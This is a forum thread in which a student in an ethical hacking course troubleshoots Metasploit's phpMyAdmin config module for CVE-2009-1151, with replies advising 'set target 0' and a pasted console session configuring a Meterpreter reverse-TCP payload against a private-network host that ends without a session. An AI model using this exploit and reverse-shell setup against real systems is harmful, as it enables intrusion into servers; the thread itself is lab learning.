Metasploit : An Invalid Argument Was Specific. Invalid Target Index.

I Am Studying a Module on Ethical Hacking Where I Have Identified a Number of Vulnerabilities I Now Wish to Exploit. One Relates to Cve 2009-1151 Which in Metasploit Is Exploit/Unix/Webapp/phpmyadminconfig. I Have Attempted the Syntax but I Keep Getting the Same Error Message Telling Me an Invalid Argument Was Specified. I Cannot Find the Answer on the Web - Can Someone Help? I Attach a Copy of My Terminal Session.

_

4 Responses

Although I have not used this module, I suspect this error is generated by the URI or the port number.

What did you set as your target? It should be 0 since automatic is the only option.
msf exploit(phpmyadmin_config) > set target 0
target => 0
msf exploit(phpmyadmin_config) > show options

Thank you for your responses. I have got passed the initial hurdle by setting target 0, however I am now getting 'Exploit completed, but no session was created.

msf exploit(phpmyadminconfig) > show options_

Module options (exploit/unix/webapp/phpmyadminconfig):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port,type:host:port...
RHOST 192.168.150.14 yes The target address
RPORT 80 yes The target port
URI / yes Base phpMyAdmin directory path
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reversetcp):_

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.150.136 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)

msf exploit(phpmyadminconfig) > exploit

* Started reverse TCP handler on 192.168.150.136:4444
* Grabbing session cookie and CSRF token
* Sending save request
* Requesting our payload
* Exploit completed, but no session was created.